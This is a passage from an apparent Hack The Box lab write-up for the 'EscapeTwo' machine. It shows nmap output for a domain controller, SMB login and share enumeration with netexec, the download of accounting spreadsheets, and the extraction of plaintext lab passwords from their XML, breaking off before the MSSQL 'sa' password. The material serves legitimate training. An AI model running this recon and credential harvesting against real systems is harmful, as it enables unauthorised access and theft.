11:05, 0.04s elapsed</span><br><span class="line">Initiating SYN Stealth Scan at 11:05</span><br><span class="line">Scanning 10.10.11.51 [1000 ports]</span><br><span class="line">Discovered open port 135/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 445/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 53/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 139/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 3268/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 636/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 593/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 389/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 88/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 1433/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 464/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 464/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 3269/tcp on 10.10.11.51</span><br><span class="line">Discovered open port 5985/tcp on 10.10.11.51</span><br><span class="line">Completed SYN Stealth Scan at 11:05, 41.44s elapsed (1000 total ports)</span><br><span class="line">Initiating Service scan at 11:05</span><br><span class="line">Scanning 13 services on 10.10.11.51</span><br><span class="line">Completed Service scan at 11:06, 60.46s elapsed (13 services on 1 host)</span><br><span class="line">NSE: Script scanning 10.10.11.51.</span><br><span class="line">Initiating NSE at 11:06</span><br><span class="line">Completed NSE at 11:07, 40.15s elapsed</span><br><span class="line">Initiating NSE at 11:07</span><br><span class="line">Completed NSE at 11:07, 12.84s elapsed</span><br><span class="line">Initiating NSE at 11:07</span><br><span class="line">Completed NSE at 11:07, 0.00s elapsed</span><br><span class="line">Nmap scan report for 10.10.11.51</span><br><span class="line">Host is up (0.36s latency).</span><br><span class="line">Not shown: 987 filtered tcp ports (no-response)</span><br><span class="line">PORT     STATE SERVICE       VERSION</span><br><span class="line">53/tcp   open  domain        Simple DNS Plus</span><br><span class="line">88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-24 09:11:45Z)</span><br><span class="line">135/tcp  open  msrpc         Microsoft Windows RPC</span><br><span class="line">139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)</span><br><span class="line">|_ssl-date: 2025-02-24T09:13:31+00:00; -6h54m09s from scanner time.</span><br><span class="line">| ssl-cert: Subject: commonName=DC01.sequel.htb</span><br><span class="line">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.sequel.htb</span><br><span class="line">| Issuer: commonName=sequel-DC01-CA</span><br><span class="line">| Public Key type: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2024-06-08T17:35:00</span><br><span class="line">| Not valid after:  2025-06-08T17:35:00</span><br><span class="line">| MD5:   09fd:3df4:9f58:da05:410d:e89e:7442:b6ff</span><br><span class="line">|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5</span><br><span class="line">445/tcp  open  microsoft-ds?</span><br><span class="line">464/tcp  open  kpasswd5?</span><br><span class="line">593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)</span><br><span class="line">|_ssl-date: 2025-02-24T09:13:30+00:00; -6h54m10s from scanner time.</span><br><span class="line">| ssl-cert: Subject: commonName=DC01.sequel.htb</span><br><span class="line">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.sequel.htb</span><br><span class="line">| Issuer: commonName=sequel-DC01-CA</span><br><span class="line">| Public Key type: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2024-06-08T17:35:00</span><br><span class="line">| Not valid after:  2025-06-08T17:35:00</span><br><span class="line">| MD5:   09fd:3df4:9f58:da05:410d:e89e:7442:b6ff</span><br><span class="line">|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5</span><br><span class="line">1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM</span><br><span class="line">| ms-sql-ntlm-info: </span><br><span class="line">|   10.10.11.51:1433: </span><br><span class="line">|     Target_Name: SEQUEL</span><br><span class="line">|     NetBIOS_Domain_Name: SEQUEL</span><br><span class="line">|     NetBIOS_Computer_Name: DC01</span><br><span class="line">|     DNS_Domain_Name: sequel.htb</span><br><span class="line">|     DNS_Computer_Name: DC01.sequel.htb</span><br><span class="line">|     DNS_Tree_Name: sequel.htb</span><br><span class="line">|_    Product_Version: 10.0.17763</span><br><span class="line">|_ssl-date: 2025-02-24T09:13:32+00:00; -6h54m09s from scanner time.</span><br><span class="line">| ms-sql-info: </span><br><span class="line">|   10.10.11.51:1433: </span><br><span class="line">|     Version: </span><br><span class="line">|       name: Microsoft SQL Server 2019 RTM</span><br><span class="line">|       number: 15.00.2000.00</span><br><span class="line">|       Product: Microsoft SQL Server 2019</span><br><span class="line">|       Service pack level: RTM</span><br><span class="line">|       Post-SP patches applied: false</span><br><span class="line">|_    TCP port: 1433</span><br><span class="line">| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback</span><br><span class="line">| Issuer: commonName=SSL_Self_Signed_Fallback</span><br><span class="line">| Public Key type: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2025-02-24T08:22:17</span><br><span class="line">| Not valid after:  2055-02-24T08:22:17</span><br><span class="line">| MD5:   92ca:8b16:646f:7eec:1116:b93d:4e7f:f5f4</span><br><span class="line">|_SHA-1: 1277:c2ac:0636:9bfa:1d55:81c8:4a5b:3c5a:c852:192b</span><br><span class="line">3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)</span><br><span class="line">| ssl-cert: Subject: commonName=DC01.sequel.htb</span><br><span class="line">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.sequel.htb</span><br><span class="line">| Issuer: commonName=sequel-DC01-CA</span><br><span class="line">| Public Key type: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2024-06-08T17:35:00</span><br><span class="line">| Not valid after:  2025-06-08T17:35:00</span><br><span class="line">| MD5:   09fd:3df4:9f58:da05:410d:e89e:7442:b6ff</span><br><span class="line">|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5</span><br><span class="line">|_ssl-date: 2025-02-24T09:13:32+00:00; -6h54m09s from scanner time.</span><br><span class="line">3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)</span><br><span class="line">| ssl-cert: Subject: commonName=DC01.sequel.htb</span><br><span class="line">| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.sequel.htb</span><br><span class="line">| Issuer: commonName=sequel-DC01-CA</span><br><span class="line">| Public Key type: rsa</span><br><span class="line">| Public Key bits: 2048</span><br><span class="line">| Signature Algorithm: sha256WithRSAEncryption</span><br><span class="line">| Not valid before: 2024-06-08T17:35:00</span><br><span class="line">| Not valid after:  2025-06-08T17:35:00</span><br><span class="line">| MD5:   09fd:3df4:9f58:da05:410d:e89e:7442:b6ff</span><br><span class="line">|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5</span><br><span class="line">|_ssl-date: 2025-02-24T09:13:30+00:00; -6h54m09s from scanner time.</span><br><span class="line">5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-title: Not Found</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">| smb2-time: </span><br><span class="line">|   date: 2025-02-24T09:12:50</span><br><span class="line">|_  start_date: N/A</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">|   3:1:1: </span><br><span class="line">|_    Message signing enabled and required</span><br><span class="line">|_clock-skew: mean: -6h54m10s, deviation: 1s, median: -6h54m09s</span><br><span class="line"></span><br><span class="line">NSE: Script Post-scanning.</span><br><span class="line">Initiating NSE at 11:07</span><br><span class="line">Completed NSE at 11:07, 0.00s elapsed</span><br><span class="line">Initiating NSE at 11:07</span><br><span class="line">Completed NSE at 11:07, 0.00s elapsed</span><br><span class="line">Initiating NSE at 11:07</span><br><span class="line">Completed NSE at 11:07, 0.00s elapsed</span><br><span class="line">Read data files from: /usr/share/nmap</span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 155.78 seconds</span><br><span class="line">           Raw packets sent: 2999 (131.932KB) | Rcvd: 35 (1.524KB)</span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su                                          </span><br><span class="line">SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su </span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><h4 id="Share-enumeration"><a href="#Share-enumeration" class="headerlink" title="Share enumeration"></a>Share enumeration</h4><p>By using netexec’s <code>spider_plus</code> module we were able to see two excel file and copied to our machine.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su -M spider_plus</span><br><span class="line">SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su </span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*] Started module spidering_plus with the following options:</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*]  DOWNLOAD_FLAG: False</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*]     STATS_FLAG: True</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*] EXCLUDE_FILTER: [&#x27;print$&#x27;, &#x27;ipc$&#x27;]</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*]   EXCLUDE_EXTS: [&#x27;ico&#x27;, &#x27;lnk&#x27;]</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*]  MAX_FILE_SIZE: 50 KB</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus</span><br><span class="line">SMB         10.10.11.51     445    DC01             [*] Enumerated shares</span><br><span class="line">SMB         10.10.11.51     445    DC01             Share           Permissions     Remark                                                                                                                        </span><br><span class="line">SMB         10.10.11.51     445    DC01             -----           -----------     ------                                                                                                                        </span><br><span class="line">SMB         10.10.11.51     445    DC01             Accounting Department READ                                                                                                                                    </span><br><span class="line">SMB         10.10.11.51     445    DC01             ADMIN$                          Remote Admin                                                                                                                  </span><br><span class="line">SMB         10.10.11.51     445    DC01             C$                              Default share                                                                                                                 </span><br><span class="line">SMB         10.10.11.51     445    DC01             IPC$            READ            Remote IPC                                                                                                                    </span><br><span class="line">SMB         10.10.11.51     445    DC01             NETLOGON        READ            Logon server share                                                                                                            </span><br><span class="line">SMB         10.10.11.51     445    DC01             SYSVOL          READ            Logon server share                                                                                                            </span><br><span class="line">SMB         10.10.11.51     445    DC01             Users           READ                                                                                                                                          </span><br><span class="line"></span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [+] Saved share-file metadata to &quot;/tmp/nxc_hosted/nxc_spider_plus/10.10.11.51.json&quot;.</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Shares:           7 (Accounting Department, ADMIN$, C$, IPC$, NETLOGON, SYSVOL, Users)</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Readable Shares:  5 (Accounting Department, IPC$, NETLOGON, SYSVOL, Users)</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Filtered Shares:  1</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*] Total folders found:  76</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*] Total files found:    67</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size average:    23.74 KB</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size min:        0 B</span><br><span class="line">SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size max:        512 KB</span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo cat /tmp/nxc_hosted/nxc_spider_plus/10.10.11.51.json</span><br><span class="line">&#123;</span><br><span class="line">    &quot;Accounting Department&quot;: &#123;</span><br><span class="line">        &quot;accounting_2024.xlsx&quot;: &#123;</span><br><span class="line">            &quot;atime_epoch&quot;: &quot;2024-06-09 06:50:41&quot;,</span><br><span class="line">            &quot;ctime_epoch&quot;: &quot;2024-06-09 05:45:02&quot;,</span><br><span class="line">            &quot;mtime_epoch&quot;: &quot;2024-06-09 07:11:31&quot;,</span><br><span class="line">            &quot;size&quot;: &quot;9.98 KB&quot;</span><br><span class="line">        &#125;,</span><br><span class="line">        &quot;accounts.xlsx&quot;: &#123;</span><br><span class="line">            &quot;atime_epoch&quot;: &quot;2024-06-09 06:52:21&quot;,</span><br><span class="line">            &quot;ctime_epoch&quot;: &quot;2024-06-09 06:52:07&quot;,</span><br><span class="line">            &quot;mtime_epoch&quot;: &quot;2024-06-09 07:11:31&quot;,</span><br><span class="line">            &quot;size&quot;: &quot;6.62 KB&quot;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;,</span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su --get-file accounting_2024.xlsx accounting_2024.xlsx --share &quot;Accounting Department&quot;</span><br><span class="line">SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su </span><br><span class="line">SMB         10.10.11.51     445    DC01             [*] Copying &quot;accounting_2024.xlsx&quot; to &quot;accounting_2024.xlsx&quot;</span><br><span class="line">SMB         10.10.11.51     445    DC01             [+] File &quot;accounting_2024.xlsx&quot; was downloaded to &quot;accounting_2024.xlsx&quot;</span><br><span class="line">➜  EscapeTwo nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su --get-file accounts.xlsx accounts.xlsx --share &quot;Accounting Department&quot;</span><br><span class="line">SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su </span><br><span class="line">SMB         10.10.11.51     445    DC01             [*] Copying &quot;accounts.xlsx&quot; to &quot;accounts.xlsx&quot;</span><br><span class="line">SMB         10.10.11.51     445    DC01             [+] File &quot;accounts.xlsx&quot; was downloaded to &quot;accounts.xlsx&quot;</span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><p>Since its xlsx file we can simply unzip it and get a file named <code>xl/sharedStrings.xml</code> inside that we will get credentials for mssql user <code>sa</code>.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo unzip accounts.xlsx</span><br><span class="line">Archive:  accounts.xlsx</span><br><span class="line">file #1:  bad zipfile offset (local header sig):  0</span><br><span class="line">  inflating: xl/workbook.xml         </span><br><span class="line">  inflating: xl/theme/theme1.xml     </span><br><span class="line">  inflating: xl/styles.xml           </span><br><span class="line">  inflating: xl/worksheets/_rels/sheet1.xml.rels  </span><br><span class="line">  inflating: xl/worksheets/sheet1.xml  </span><br><span class="line">  inflating: xl/sharedStrings.xml    </span><br><span class="line">  inflating: _rels/.rels             </span><br><span class="line">  inflating: docProps/core.xml       </span><br><span class="line">  inflating: docProps/app.xml        </span><br><span class="line">  inflating: docProps/custom.xml     </span><br><span class="line">  inflating: [Content_Types].xml     </span><br><span class="line">➜  EscapeTwo firefox xl/sharedStrings.xml</span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Xml"><figure class="iseeu highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">sst</span> <span class="attr">count</span>=<span class="string">&quot;25&quot;</span> <span class="attr">uniqueCount</span>=<span class="string">&quot;24&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>First Name<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Last Name<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Email<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Username<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Password<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Angela<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Martin<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>angela@sequel.htb<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>angela<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>0fwz7Q4mSpurIt99<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Oscar<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Martinez<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>oscar@sequel.htb<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>oscar<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>86LxLBMgEWaKUnBG<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Kevin<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Malone<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>kevin@sequel.htb<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>kevin<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>Md9Wlq1E5bZnVDVo<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>NULL<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>sa@sequel.htb<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>sa<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span 